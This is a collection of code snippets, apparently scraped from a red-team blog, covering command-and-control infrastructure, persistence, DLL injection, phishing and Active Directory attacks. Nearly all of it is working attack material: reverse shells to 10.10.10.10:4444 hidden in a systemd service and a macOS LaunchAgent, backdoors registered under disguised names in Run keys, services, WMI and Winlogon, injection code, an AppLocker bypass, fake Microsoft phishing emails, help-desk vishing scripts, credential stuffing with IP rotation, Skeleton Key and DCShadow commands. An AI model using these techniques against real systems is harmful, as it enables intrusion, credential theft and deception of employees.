### Install and Configure Dev Tunnels CLI Source: https://0xdbgman.github.io/posts/red-team-infrastructure-the-full-picture Installs the Dev Tunnels CLI, logs in a user, and sets up a tunnel for C2 communication. This requires `curl` and `bash` for installation and the `devtunnel` CLI for subsequent operations. ```bash # Install Dev Tunnels CLI curl -sL https://aka.ms/DevTunnelCliInstall | bash # Login with Microsoft account devtunnel user login # Create and host tunnel devtunnel create -a devtunnel port create -p 443 devtunnel host ``` -------------------------------- ### Flask Python Redirector Setup Source: https://0xdbgman.github.io/posts/red-team-infrastructure-the-full-picture This snippet outlines the initial setup for a Flask-based redirector on an Ubuntu system. It installs necessary packages like Flask, requests, Gunicorn, and Certbot. It also creates a directory for the Flask application. ```bash # On a fresh Ubuntu EC2 instance apt update && apt install -y python3-flask python3-requests gunicorn certbot mkdir -p /root/flask_redir && cd /root/flask_redir ``` -------------------------------- ### Install and Configure Apache for Redirector Source: https://0xdbgman.github.io/posts/red-team-infrastructure-the-full-picture Installs Apache and necessary modules, enables proxy and rewrite capabilities, disables default site, and hardens server information to mimic IIS for better OPSEC. Restarts Apache to apply changes. ```bash sudo apt update sudo apt install -y apache2 libapache2-mod-security2 sudo a2enmod proxy proxy_http proxy_connect ssl rewrite headers deflate security2 sudo a2dissite 000-default echo 'ServerTokens Prod' >> /etc/apache2/apache2.conf echo 'ServerSignature Off' >> /etc/apache2/apache2.conf echo 'Header set Server "Microsoft-IIS/10.0"' >> /etc/apache2/apache2.conf sudo systemctl restart apache2 ``` -------------------------------- ### Create Active Setup Persistence - PowerShell Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This PowerShell script creates a new Active Setup entry in the registry. Active Setup compares HKLM and HKCU version keys; if HKLM is higher, the StubPath command executes as the logged-on user. This is useful for enterprise environments with frequent new user logins. ```powershell $ $guid = "{" + [System.Guid]::NewGuid().ToString().ToUpper() + "}" $key = "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\$guid" New-Item -Path $key -Force Set-ItemProperty -Path $key -Name "StubPath" -Value "C:\Windows\System32\backdoor.exe" Set-ItemProperty -Path $key -Name "Version" -Value "1,0,0,0" Set-ItemProperty -Path $key -Name "ComponentID" -Value "Microsoft Update Helper" ``` -------------------------------- ### Install Application Shimming - Batch Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This batch command installs a custom shim database (.sdb file) using `sdbinst.exe`. Application shimming allows for DLL injection, API redirection, or behavior patching in applications at load time, surviving reboots and AV scans. The registry query verifies the installation. ```batch :: Install custom shim database sdbinst.exe C:\shim\backdoor.sdb :: Verify installation reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" ``` -------------------------------- ### Install iRedMail for Mail Server Setup Source: https://0xdbgman.github.io/posts/red-team-infrastructure-the-full-picture Downloads and installs iRedMail, a mail server solution, using `wget` and `tar`. This script initiates the setup process for a dedicated mail server to ensure email deliverability. ```bash # Install iRedMail wget https://github.com/iredmail/iRedMail/archive/refs/tags/1.7.1.tar.gz tar xzf 1.7.1.tar.gz && cd iRedMail-1.7.1/ sudo bash iRedMail.sh ``` -------------------------------- ### Initial Setup Phase: DLL Injection Source: https://0xdbgman.github.io/posts/beacon-as-youve-never-seen-it-before This section details the initial steps required to inject a Reflective DLL into a target process. It covers gaining access, allocating memory, writing the DLL, finding the loader, and initiating execution. ```APIDOC ## Initial Setup Phase: DLL Injection This phase involves preparing the target process for DLL execution. ### 1. Gain Access to the Target Process Use `OpenProcess` to obtain a handle to the target process with the necessary permissions for memory operations and thread creation. - **API Signature**: `HANDLE OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);` ### 2. Reserve Memory in the Target Call `VirtualAllocEx` to allocate a region of memory within the target process's address space, sized appropriately for the DLL. - **API Signature**: `LPVOID VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);` - **Initial Permissions**: Start with `PAGE_READWRITE` for ease of writing. ### 3. Transfer DLL Data to Memory Use `WriteProcessMemory` to copy the DLL's binary content into the allocated memory region. - **API Signature**: `BOOL WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T lpNumberOfBytesWritten);` ### 4. Identify ReflectiveLoader Position Determine the offset of the `ReflectiveLoader` function within the DLL's in-memory export directory. This function is responsible for the DLL's self-mapping capabilities. - **Utilities**: Use functions like `GetReflectiveLoaderOffset` for name-based searches or RVA-to-offset conversions. ### 5. Initiate the Execution Thread Create a remote thread in the target process using `CreateRemoteThread`, pointing its start address to the `ReflectiveLoader`'s location (base address + offset). - **API Signature**: `HANDLE CreateRemoteThread(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);` - **Purpose**: This action triggers the DLL's reflective loading mechanism. ``` -------------------------------- ### Install and Configure Cloudflared for Zero Trust Tunnels Source: https://0xdbgman.github.io/posts/red-team-infrastructure-the-full-picture Installs the `cloudflared` executable, logs into Cloudflare, creates a tunnel, and runs it to connect to a C2 server. This process requires `curl` for downloading and `chmod` for making the executable runnable. ```bash # Install cloudflared curl -L https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 -o /usr/local/bin/cloudflared chmod +x /usr/local/bin/cloudflared # Authenticate cloudflared tunnel login # Create tunnel cloudflared tunnel create c2-tunnel # Run tunnel (connects to your C2 server) cloudflared tunnel run --token ``` -------------------------------- ### Install Systemd Unit for Persistence Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This snippet shows how to create a systemd service unit file to ensure a malicious executable runs automatically at boot and restarts if it crashes. It targets the systemd init system. ```systemd [Unit] Description=Network Name Resolution After=network.target [Service] ExecStart=/usr/lib/.system/.tmpdata.resolveld Restart=always [Install] WantedBy=multi-user.target ``` -------------------------------- ### Install and Run GoPhish for Campaign Management Source: https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in This command sequence downloads, unzips, and executes GoPhish, a tool for managing phishing campaigns. It allows for the creation of email templates, target lists, sending profiles, landing pages, and campaign tracking. ```bash # Install GoPhish wget https://github.com/gophish/gophish/releases/latest/download/gophish-linux-64bit.zip unzip gophish-linux-64bit.zip && cd gophish chmod +x gophish && ./gophish ``` -------------------------------- ### Install Apache with PHP and MySQL Support Source: https://0xdbgman.github.io/posts/the-art-of-phishing-part-one This bash script installs the Apache web server, PHP, and necessary PHP modules (MySQL, cURL, mbstring) on a Debian-based system. It prepares the server environment for hosting web applications, including phishing pages. ```bash # 1 Install sudo apt update && sudo apt install apache2 php libapache2-mod-php php-mysql php-curl php-mbstring -y # 2 Folder sudo mkdir -p /var/www/alahli-login.com/public_html sudo chown -R $USER:$USER /var/www/alahli-login.com/public_html ``` -------------------------------- ### Initial DLL Injection Setup (Win32 API) Source: https://0xdbgman.github.io/posts/beacon-as-youve-never-seen-it-before This sequence of Win32 API calls is used to prepare a target process for in-memory DLL injection. It involves gaining access, allocating memory, writing the DLL, and initiating execution via a remote thread. ```c++ HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId); LPVOID remoteBuffer = VirtualAllocEx(hProcess, NULL, dllSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); WriteProcessMemory(hProcess, remoteBuffer, dllBuffer, dllSize, NULL); // Assuming GetReflectiveLoaderOffset returns the offset of the ReflectiveLoader function DWORD reflectiveLoaderOffset = GetReflectiveLoaderOffset(remoteBuffer); LPVOID entryPoint = (LPVOID)((ULONG_PTR)remoteBuffer + reflectiveLoaderOffset); HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)entryPoint, NULL, 0, NULL); ``` -------------------------------- ### Obtain Let's Encrypt TLS Certificate with Apache Source: https://0xdbgman.github.io/posts/red-team-infrastructure-the-full-picture Installs Certbot and its Apache plugin, then uses Certbot to obtain and install a Let's Encrypt TLS certificate for a specified domain, enabling HTTPS for the redirector. ```bash sudo apt install -y certbot python3-certbot-apache sudo certbot --apache -d yourdomain.com ``` -------------------------------- ### Create Linux Systemd Service for Persistence Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This snippet demonstrates creating a systemd service unit file on Linux to achieve persistence. The service is configured to run a continuous reverse shell, restart automatically if it fails, and start on boot. It includes commands to enable and start the service, and verify its status. ```bash # Create service unit file cat > /etc/systemd/system/system-network-monitor.service << 'EOF' [Unit] Description=Network Monitor Service After=network.target [Service] Type=simple User=root ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/10.10.10.10/4444 0>&1; sleep 60; done' Restart=always RestartSec=30 [Install] WantedBy=multi-user.target EOF # Enable and start systemctl daemon-reload systemctl enable system-network-monitor.service systemctl start system-network-monitor.service # Verify systemctl status system-network-monitor.service ``` -------------------------------- ### Set Up Evilginx for Adversary-in-the-Middle Attacks Source: https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in This sequence of commands installs and configures Evilginx, an AitM framework. It involves cloning the repository, compiling the binary, setting up the configuration with a domain and IP, loading a phishlet (e.g., for Office 365), and generating a lure URL for phishing. ```bash # Install Evilginx git clone https://github.com/kgretzky/evilginx2.git cd evilginx2 && make sudo ./bin/evilginx -p ./phishlets # Configure domain and IP config domain yourdomain.com config ipv4 YOUR_SERVER_IP # Load Office 365 phishlet phishlets hostname o365 login.yourdomain.com phishlets enable o365 # Create lure URL lures create o365 lures get-url 0 ``` -------------------------------- ### Executing Payload in Writable Path Source: https://0xdbgman.github.io/posts/sec-controls-the-art-of-breaking-through Shows a simple example of dropping a payload into a writable directory within `%WINDIR%` and executing it. This bypasses AppLocker by leveraging default `Allow` rules for `%WINDIR%`. ```powershell copy payload.exe C:\Windows\Tasks\svchost.exe C:\Windows\Tasks\svchost.exe ``` -------------------------------- ### Create Scheduled Task with CMD (Windows) Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in Creates a scheduled task using the command prompt. This example shows how to create tasks that run at logon, system startup, or at a specified interval (every 10 minutes). The tasks are configured to run with SYSTEM privileges. ```cmd # CMD create a task that runs at every logon schtasks /create /tn "MicrosoftWindowsUpdate" /tr "C:\Windows\System32\cmd.exe /c C:\payload.exe" /sc onlogon /ru SYSTEM /f # Run at system startup schtasks /create /tn "WindowsDefenderSync" /tr "C:\payload.exe" /sc onstart /ru SYSTEM /f # Run every 10 minutes schtasks /create /tn "SystemHealthCheck" /tr "C:\payload.exe" /sc minute /mo 10 /ru SYSTEM /f ``` -------------------------------- ### AppLocker Architecture and Default Rules Source: https://0xdbgman.github.io/posts/sec-controls-the-art-of-breaking-through Illustrates the AppLocker enforcement process and the default allow rules for executables, scripts, and installers. It shows how AppLocker checks policy rules before allowing applications to run. ```text Process wants to execute │ ▼ AppIDSvc (User Mode Service) → Checks policy rules (Registry: HKLM\Software\Policies\Microsoft\Windows\SrpV2) │ ┌─────▼─────────────────────────────┐ │ Rule Types │ │ 1. Publisher (code signing cert) │ │ 2. Path (file/folder path) │ │ 3. File Hash (SHA256) │ └───────────────────────────────────┘ │ Allow or Block Allow | Everyone | Path | %PROGRAMFILES%\ Allow | Everyone | Path | %WINDIR%\ Allow | Admins | Path | * Allow | Everyone | Path | %PROGRAMFILES%\ Allow | Everyone | Path | %WINDIR%\ Allow | Admins | Path | * Allow | Everyone | Publisher | * (any signed installer) Allow | Admins | Path | *.* ``` -------------------------------- ### ReflectiveLoader: Locating Kernel Functions (Example) Source: https://0xdbgman.github.io/posts/beacon-as-youve-never-seen-it-before Illustrative C++ code demonstrating how a reflective loader might locate essential kernel functions like LoadLibraryA and GetProcAddress by parsing the PEB and module lists. This is a simplified representation. ```c++ #include #include // Simplified function to get PEB (assuming x64) PPEB GetPEB() { return (PPEB)__readgsqword(0x60); } // Simplified custom hash function (example) DWORD CustomHash(const char* str) { DWORD hash = 0; // ROT13-like or other custom hashing logic here while (*str) { hash = (*str << 5) + hash + *str++; } return hash; } // Function to find a specific module's base address by hash LPVOID FindModuleBase(DWORD moduleHash) { PPEB peb = GetPEB(); PLDR_DATA_TABLE_ENTRY moduleEntry = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InMemoryOrderModuleList.Flink; while (moduleEntry->InMemoryOrderLinks.Flink != &peb->Ldr->InMemoryOrderModuleList) { // Compare hashes of module names if (CustomHash(moduleEntry->FullDllName.Buffer) == moduleHash) { return moduleEntry->DllBase; } moduleEntry = (PLDR_DATA_TABLE_ENTRY)moduleEntry->InMemoryOrderLinks.Flink; } return NULL; } // Example usage to find kernel32.dll and then GetProcAddress void LocateKernelApis() { LPVOID kernel32Base = FindModuleBase(CustomHash("kernel32.dll")); if (kernel32Base) { // Parse kernel32.dll's export table to find LoadLibraryA, GetProcAddress etc. // This part requires detailed PE parsing logic. } } ``` -------------------------------- ### PowerShell: Renaming Registry Persistence Keys Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in Demonstrates how to create a new registry run key for persistence, using a name that blends with the target environment to avoid suspicion. This contrasts with a 'bad' example that uses an obviously malicious name. ```powershell # Bad immediately suspicious New-ItemProperty -Path "HKCU:\...\Run" -Name "backdoor" -Value "C:\evil.exe" # Good blends with environment New-ItemProperty -Path "HKCU:\...\Run" -Name "OneDriveSyncHelper" -Value "C:\Users\Public\Libraries\OneDrive\sync.exe" ``` -------------------------------- ### Create and Modify Windows Services using SC.exe Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in Demonstrates how to create a new service with a specified binary path and startup type, and how to modify the binary path of an existing legitimate service for stealth. It also shows direct registry manipulation using reg.exe for service configuration. ```batch sc.exe create "WindowsTelemetrySync" binPath= "C:\Windows\System32\svchost.exe -k netsvcs" start= auto type= share # Modify binary path of existing legitimate service (stealthier) sc.exe config "WpnUserService" binPath= "C:\Windows\payload.exe" # Using reg.exe directly reg add "HKLM\SYSTEM\CurrentControlSet\Services\MyService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\System32\svchost.exe -k DcomLaunch" /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\MyService" /v Start /t REG_DWORD /d 2 /f ``` -------------------------------- ### Vishing Attack Scenario: Callback Phishing (Hybrid) Source: https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in Example of a hybrid vishing attack combining email and phone calls. The victim is prompted to call a number, leading them to install malicious software disguised as support tools. ```text Email: "Your subscription will be charged $499.99. Call 1-800-XXX-XXXX to cancel." Victim calls → Attacker guides them to install "support software" (your payload) ``` -------------------------------- ### Create XDG Autostart Entry for Desktop Persistence Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This code shows how to create `.desktop` files in XDG autostart directories to execute applications automatically upon user login in desktop environments like GNOME, KDE, or XFCE. It covers both user-level (no root required) and system-wide persistence. ```shell # User-level (no root) fires on desktop login mkdir -p ~/.config/autostart cat > ~/.config/autostart/system-update.desktop << 'EOF' [Desktop Entry] Type=Application Name=System Update Helper Exec=/bin/bash -c '/usr/lib/.update &' Hidden=false NoDisplay=true X-GNOME-Autostart-enabled=true EOF # System-wide (root) all users cat > /etc/xdg/autostart/gnome-keyring-update.desktop << 'EOF' [Desktop Entry] Type=Application Name=GNOME Keyring Update Exec=/usr/lib/.sysd-update Hidden=false NoDisplay=true EOF ``` -------------------------------- ### Create and Load macOS LaunchDaemon for Root Persistence Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This snippet demonstrates how to create a malicious `com.apple.kextd.helper.plist` file in the system-wide LaunchDaemons directory and load it with `launchctl`. This allows a script to run as root at system startup, providing high-level persistence. It requires administrative privileges to execute. ```bash # System-wide daemon (requires sudo) sudo cat > /Library/LaunchDaemons/com.apple.kextd.helper.plist << 'EOF' Label com.apple.kextd.helper ProgramArguments /usr/bin/python3 /Library/Apple/System/Library/CoreServices/.update.py RunAtLoad KeepAlive UserName root EOF sudo launchctl load /Library/LaunchDaemons/com.apple.kextd.helper.plist ``` -------------------------------- ### Install Nginx and Certbot for Redirector Source: https://0xdbgman.github.io/posts/red-team-infrastructure-the-full-picture Installs Nginx web server and Certbot with the Nginx plugin for obtaining and managing SSL/TLS certificates. This is a prerequisite for setting up Nginx as an HTTPS redirector. ```bash sudo apt install -y nginx certbot python3-certbot-nginx ``` -------------------------------- ### Encrypted ZIP Attachment Example Source: https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in A simple yet effective spearphishing email example using an encrypted ZIP archive as an attachment. The password is provided within the email body, requiring the recipient to decrypt the file to access its contents. ```plaintext From: accounting@vendor-company.com To: finance@target.com Subject: Invoice #4892 Payment Overdue Please find the attached invoice. Password: Inv2026 [Attachment: Invoice_4892.zip] ``` -------------------------------- ### Credential Harvesting Link Example Source: https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in An example of a spearphishing email designed to lure recipients to a credential harvesting page, often powered by tools like Evilginx. The email mimics legitimate security alerts to prompt users to click a malicious link. ```plaintext From: security@microsoft-365-alerts.com To: admin@target.com Subject: [Action Required] Unusual Sign-in Activity Detected We detected an unusual sign-in to your account from an unrecognized device. If this wasn't you, please review your account security immediately: → Review Activity: https://login.yourdomain.com/review Microsoft Account Security Team ``` -------------------------------- ### HTML Smuggling Attachment Example Source: https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in An example of an email pretext using HTML smuggling to deliver a malicious attachment, typically an ISO or VHD file containing a loader. This method bypasses some email security scanners by embedding the payload within an HTML file. ```plaintext From: benefits@targetcorp-hr.com To: john.smith@target.com Subject: Updated Benefits Enrollment Action Required Hi John, Open enrollment for 2026 benefits closes Friday. Please review the attached document and confirm your selections. [Attachment: Benefits_Enrollment_2026.html] Thanks, HR Department ``` -------------------------------- ### Install and Configure ModSecurity for Apache Source: https://0xdbgman.github.io/posts/the-art-of-phishing-part-one This process involves installing the ModSecurity module for Apache and then configuring it to enhance security. The configuration involves enabling the module and setting specific rules, such as `SecServerSignature`. ```bash # 1 sudo apt install libapache2-mod-security2 -y # 2 sudo systemctl restart apache2 # 3 Edit security.conf and add: SecRuleEngine On SecServerSignature "LiteSpeed" ``` -------------------------------- ### Process Creation APIs in Windows Source: https://0xdbgman.github.io/posts/pwning-the-kernel-windows-internals-driver-exploitation Demonstrates the Windows APIs used for creating new processes. These functions ultimately call the kernel function NtCreateUserProcess for execution. ```csharp CreateProcessW CreateProcessAsUserW CreateProcessWithLogonW ``` -------------------------------- ### Implement Persistence via Port Monitor DLL (PowerShell) Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in Establishes persistence by loading a custom DLL into the Print Spooler service. This involves copying a malicious DLL to the System32 directory and creating a registry key under 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors' to register it as a port monitor. Restarting the Print Spooler service loads the DLL. ```PowerShell # Copy malicious DLL to System32 (required path) Copy-Item C:\payload.dll C:\Windows\System32\legitmon.dll # Add monitor registry key $key = "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors\LegitMonitor" New-Item -Path $key -Force New-ItemProperty -Path $key -Name "Driver" -Value "legitmon.dll" -PropertyType String # Trigger: restart Print Spooler Restart-Service Spooler ``` -------------------------------- ### Authenticate with Skeleton Key Master Password Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in After applying Skeleton Key, any domain account can authenticate using the master password ('mimikatz'). This example shows how to use this to mount a network share or execute commands remotely. ```powershell # Now authenticate to any machine as any user with master password "mimikatz": # net use \\target\C$ /user:corp\Administrator mimikatz # psexec \\target -u corp\Administrator -p mimikatz cmd ``` -------------------------------- ### Windows Winlogon Helper Persistence (PowerShell) Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This PowerShell snippet demonstrates how to achieve persistence by modifying the 'Userinit' value in the Windows Registry's Winlogon key. This technique allows for the execution of additional programs after a user logs in, and it is less monitored than the standard Run keys. ```powershell # Userinit runs after logon (comma-delimited, original value must stay) Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" ` -Name "Userinit" ` -Value "C:\Windows\system32\userinit.exe,C:\Windows\system32\backdoor.exe," ``` -------------------------------- ### Vishing Attack Scenario: MFA Reset Source: https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in Example script for a vishing attack targeting an IT help desk to reset a user's Multi-Factor Authentication (MFA). This scenario aims to bypass MFA controls by requesting a re-enrollment. ```text "I got a new phone and my authenticator app isn't working. I need to re-enroll MFA. Can you help me set it up?" ``` -------------------------------- ### Register Netsh Helper DLL (Registry) Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This technique involves registering a DLL as a helper for the `netsh.exe` utility. By adding a registry value under `HKLM\SOFTWARE\Microsoft\Netsh` where the value name is arbitrary and the data is the path to the DLL, the helper DLL will be loaded whenever `netsh` is executed. The `InitHelperDll` export function of the DLL is called upon loading. ```batch reg add "HKLM\SOFTWARE\Microsoft\Netsh" /v "NetworkHelper" /t REG_SZ /d "C:\Windows\System32\netshbackdoor.dll" /f ``` -------------------------------- ### Create udev Rule for Device Event Persistence Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This snippet illustrates how to create a udev rule that executes a command whenever a network interface is added. This provides persistence as network interfaces are typically brought up on every boot. It also includes a command to test the rule immediately. ```shell # Rule fires when any network interface is added (every boot) cat > /etc/udev/rules.d/99-netmon.rules << 'EOF' ACTION=="add", SUBSYSTEM=="net", RUN+="/usr/bin/bash -c '/usr/lib/.update &'" EOF # Test immediately (simulate network event) udevadm trigger --subsystem-match=net --action=add ``` -------------------------------- ### Vishing Attack Scenario: Help Desk Password Reset Source: https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in Example script for a vishing attack targeting an IT help desk to reset a user's password. This scenario relies on social engineering tactics and pre-gathered OSINT. ```text Call target's IT help desk "Hi, this is [Employee Name] from [Department]. I'm locked out of my account and I'm on deadline for [Project]. My manager [Manager Name] said to call you directly. Can you reset my password? My employee ID is [OSINT'd ID]." ``` -------------------------------- ### Create Windows Service using PowerShell Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This snippet shows how to create a new Windows service using PowerShell. It specifies the service name, the path to its binary, the startup type, and an optional description. ```powershell New-Service -Name "WindowsTelemetrySync" ` -BinaryPathName "C:\Windows\payload.exe" ` -StartupType Automatic ` -Description "Windows Telemetry Synchronization Service" ``` -------------------------------- ### Create and Load macOS LaunchAgent for Persistence Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This code creates a malicious `com.apple.systemupdater.plist` file in the user's LaunchAgents directory and then loads it using `launchctl`. This allows a script or reverse shell to execute automatically upon user login, providing persistence without requiring administrative privileges. ```bash # Create malicious plist cat > ~/Library/LaunchAgents/com.apple.systemupdater.plist << 'EOF' Label com.apple.systemupdater ProgramArguments /bin/bash -c bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 RunAtLoad KeepAlive StartInterval 300 EOF # Load immediately (no reboot required) launchctl load ~/Library/LaunchAgents/com.apple.systemupdater.plist ``` -------------------------------- ### Implement WMI Event Subscription for Persistence (PowerShell) Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This PowerShell script demonstrates how to establish fileless persistence using WMI Event Subscriptions. It creates an EventFilter to trigger on system startup within a specific time window, a CommandLineEventConsumer to execute a command (placeholder for a base64 encoded payload), and binds them together. This method leaves no disk artifacts or startup entries. ```powershell # Step 1: Create the Event Filter (trigger: system startup uptime > 60 seconds) $filterName = "WindowsUpdateFilter" $query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 60 AND TargetInstance.SystemUpTime < 120" $filter = ([wmiclass]"\\.\root\subscription:__EventFilter").CreateInstance() $filter.Name = $filterName $filter.QueryLanguage = "WQL" $filter.Query = $query $filter.EventNamespace = "Root\Cimv2" $filterResult = $filter.Put() $filterPath = $filterResult.Path # Step 2: Create the Event Consumer (action: execute command) $consumerName = "WindowsUpdateConsumer" $command = "powershell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand " $consumer = ([wmiclass]"\\.\root\subscription:CommandLineEventConsumer").CreateInstance() $consumer.Name = $consumerName $consumer.CommandLineTemplate = $command $consumerResult = $consumer.Put() $consumerPath = $consumerResult.Path # Step 3: Bind the filter to the consumer $binding = ([wmiclass]"\\.\root\subscription:__FilterToConsumerBinding").CreateInstance() $binding.Filter = $filterPath $binding.Consumer = $consumerPath $binding.Put() Write-Host "[+] WMI persistence installed. Fires 60s after each boot." ``` -------------------------------- ### Inject User to Domain Admin with DCShadow Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This DCShadow example demonstrates how to elevate a user to Domain Admin by modifying their primaryGroupID to 512. This change is silently injected into Active Directory and bypasses typical audit logs for group membership changes. ```powershell Invoke-Mimikatz -Command '"lsadump::dcshadow /object:CN=lowprivuser,CN=Users,DC=corp,DC=local /attribute:primaryGroupID /value:512"' ``` -------------------------------- ### Create Scheduled Task with PowerShell (Windows) Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in Creates a scheduled task using PowerShell, offering more control over triggers and settings. This example demonstrates creating a hidden task that runs at logon with SYSTEM privileges, configured to execute a PowerShell command. ```powershell $action = New-ScheduledTaskAction -Execute "powershell.exe" ` -Argument "-NonInteractive -WindowStyle Hidden -EncodedCommand " $trigger = New-ScheduledTaskTrigger -AtLogOn $settings = New-ScheduledTaskSettingsSet ` -Hidden ` -AllowStartIfOnBatteries ` -DontStopIfGoingOnBatteries ` -ExecutionTimeLimit 0 $principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest Register-ScheduledTask ` -TaskName "MicrosoftEdgeSyncService" ` -Action $action ` -Trigger $trigger ` -Settings $settings ` -Principal $principal ` -Force ``` -------------------------------- ### Create Diamond Ticket with Impacket (Linux) Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This command sequence uses Impacket's `ticketer.py` on Linux to create a Diamond Ticket. It leverages a legitimate TGT, modifies the PAC, and re-encrypts it, making it appear as a real Kerberos ticket. The process involves specifying domain details, user credentials, KRBTGT hash, and group memberships. It's followed by setting the Kerberos cache and using `psexec.py` for authentication. ```bash # Impacket - Diamond Ticket (from Linux) python3 ticketer.py -request -domain corp.local -user lowprivuser -password 'Password123' \ -nthash -domain-sid S-1-5-21-XXXXXXXX -groups 512,519 Administrator export KRB5CCNAME=Administrator.ccache python3 psexec.py -k -no-pass corp.local/Administrator@dc01.corp.local ``` -------------------------------- ### Credential Stuffing with CredMaster Source: https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in This code example shows how to use CredMaster to test breach credentials against O365. It leverages AWS API Gateway for IP rotation, which helps in bypassing rate limiting and geo-blocking. Requires AWS credentials and the 'credmaster' tool. ```bash # CredMaster through AWS API Gateway (IP rotation) credmaster --plugin o365 -u users.txt -p 'Winter2026!' --access_key AWS_KEY --secret_access_key AWS_SECRET --region us-east-1 ``` ```bash # Test breach credentials against O365 credmaster --plugin o365 -c breached_creds.txt --access_key AWS_KEY --secret_access_key AWS_SECRET ``` -------------------------------- ### Verify WMI Event Subscription Components (PowerShell) Source: https://0xdbgman.github.io/posts/persistence-the-art-of-staying-in This PowerShell script verifies the presence of essential WMI event subscription components: __EventFilter, CommandLineEventConsumer, and __FilterToConsumerBinding. It queries the 'root\subscription' namespace to ensure these components are installed, which is crucial after setting up or troubleshooting WMI persistence. ```powershell # Verify all three components exist Get-WMIObject -Namespace root\subscription -Class __EventFilter Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding ```